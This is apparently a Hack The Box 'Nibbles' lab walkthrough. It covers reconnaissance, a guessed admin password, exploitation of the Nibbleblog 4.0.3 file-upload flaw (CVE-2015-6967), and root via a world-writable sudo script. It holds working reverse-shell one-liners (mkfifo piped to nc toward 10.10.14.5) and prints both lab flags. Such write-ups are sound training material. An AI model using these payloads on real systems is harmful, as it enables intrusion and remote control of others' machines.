# Reconnaissance

```bash
# Automatic tools
# nmapAutomator (https://github.com/21y4d/nmapAutomator)
cd /usr/local/bin/
sudo ./nmapAutomator.sh --host 10.10.10.75 --type All
# Nmap
nmap -sV -sC -A 10.10.10.75 -Pn
```

```txt
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

# Enumeration
## Enumerate on 80
[Reference]

https://0xdf.gitlab.io/2018/06/30/htb-nibbles.html

![[Nibbles-01.png]]

when we check http page and source code, will find that:
```txt
<!-- /nibbleblog/ directory. Nothing interesting here! -->
```
![[Nibbles-02.png]]

sure, let's access the http://10.10.10.75/nibbleblog/ page.
![[Nibbles-03.png]]

As there’s not much obvious to do with this blog, let’s start a `gobuster` to see what pages are there. Having noticed that the links on the page were to php files, we’ll search for php and txt extensions:
```bash
gobuster dir -e -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirb/big.txt -t 20 -x php,txt
```

```txt
===============================================================
http://10.10.10.75/nibbleblog/.htaccess            (Status: 403) [Size: 306]
http://10.10.10.75/nibbleblog/.htpasswd            (Status: 403) [Size: 306]
http://10.10.10.75/nibbleblog/.htaccess.php        (Status: 403) [Size: 310]
http://10.10.10.75/nibbleblog/.htpasswd.php        (Status: 403) [Size: 310]
http://10.10.10.75/nibbleblog/.htaccess.txt        (Status: 403) [Size: 310]
http://10.10.10.75/nibbleblog/.htpasswd.txt        (Status: 403) [Size: 310]
http://10.10.10.75/nibbleblog/LICENSE.txt          (Status: 200) [Size: 35148]
http://10.10.10.75/nibbleblog/README               (Status: 200) [Size: 4628] 
http://10.10.10.75/nibbleblog/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
http://10.10.10.75/nibbleblog/admin.php            (Status: 200) [Size: 1401]                                          
http://10.10.10.75/nibbleblog/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
http://10.10.10.75/nibbleblog/feed.php             (Status: 200) [Size: 302]                                             
http://10.10.10.75/nibbleblog/index.php            (Status: 200) [Size: 2987]                                            
http://10.10.10.75/nibbleblog/install.php          (Status: 200) [Size: 78]                                              
http://10.10.10.75/nibbleblog/languages            (Status: 301) [Size: 325]
```

With gobuster, we will find a login page http://10.10.10.75/nibbleblog/admin.php

![[Nibbles-04.png]]

![[Nibbles-05.png]]

In exploring the resulting paths, `/nibbleblog/content` is interesting, and has dir lists enabled. Digging deeper, there’s a page at `/nibbleblog/content/private/user.xml` which reveals a user, admin, as well as the IPs that have tried to log in as it:
```bash
# http://10.10.10.75/nibbleblog/content/private/users.xml
<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">0</session_fail_count>
<session_date type="integer">1514544131</session_date>
</user>
<blacklist type="string" ip="10.10.10.1">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
</users>
```

![[Nibbles-06.png]]

I wasn’t able to locate a password elsewhere on the blog, and nibbleblog doesn’t have a default password. Luckily, the guess of nibbles worked, and we are in:

![[Nibbles-07.png]]

```bash
# when we check readme page of this folder, we will find the version of Nibbleblog is 4.0.3
http://10.10.10.75/nibbleblog/README
```
![[Nibbles-08.png]]
# Exploitation

## 1. Exploit by python script
```bash
# when we search this version in searchsploit, we will find there is a Arbitrary file upload Metasploit exploit on this version
searchsploit nibbleblog 4.0.3
```

![[Nibbles-09.png]]

For this CVE-2015-6967 (https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html), we will use this exploit code: https://github.com/dix0nym/CVE-2015-6967

```bash
git clone https://github.com/dix0nym/CVE-2015-6967
cd CVE-2015-6967
# create the reverse shell shell.php
# search for "Msfvenom reverse shell cheat sheat" 
# https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
# msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=1234 -f raw > shell.php
# or use this php file
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 1234 >/tmp/f"); ?>
# run the exploit
nc -vlp 1234
python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php
```

Cool! we will get the reverse shell. We try get user flag.

```bash
cat /home/nibbler/user.txt
# flag
0f1ed7291c2cfa6b7aebf924b98b0f4e
```
![[Nibbles-17.png]]



## 2. Exploit by Manually

[This blog](https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html) provides a good write up of CVE-2015-6967, and how to exploit it.

When uploading image files via the "My image" plugin - which is delivered with NibbleBlog by default - , NibbleBlog 4.0.3 keeps the original extension of uploaded files. This extension or the actual file type are not checked, thus it is possible to upload PHP files and gain code execution.

1.  Obtain admin credentials - we already have this.
2.  Activate the “My image” plugin. If we click on “Plugings” on the menu on the left side of the admin page, it takes us to a list of installed plugins:

```bash
# First login the admin page, and access this url
http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
# click 'My image' and 'Configure' 
# then click 'save the change', and ignore warning
# visit this page
nc -vlp 1234
# acess the php file
curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

```

![[Nibbles-12.png]]

we will get the shell.

```bash
# get user flag
cat /home/nibbler/user.txt
```

For whatever reason, I’m finding that my session with this site isn’t lasting long. 
```bash
# upgrade the shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Cool, we will get the more better reverse shell.

![[Nibbles-16.png]]

# Privilege Escalation
Either through running `LinEnum.sh` or just by checking `sudo -l`, we’ll see the following:

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
```

```txt
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```

we will know user nibber could run root command on monitor.sh.

```bash
cd /home
cd nibbler
ls
unzip personal.zip
```

![[Nibbles-18.png]]

```bash
cd personal
cd stuff
ls -l1
```

![[Nibbles-20.png]]

But it doesn’t really matter, since the script is world-writable:
Rather than bluntly overwriting the script, we’ll append our shell to the end:

```bash
nc -vlp 8083
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 8083 > /tmp/f" >> monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
```

![[Nibbles-21.png]]

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
id
# get root flag
cat /root/root.txt
# flag
2d2f46f77617dc7baad3e7bfe14db12a
```

![[Nibbles-22.png]]

Cool! we will get root user reverse shell!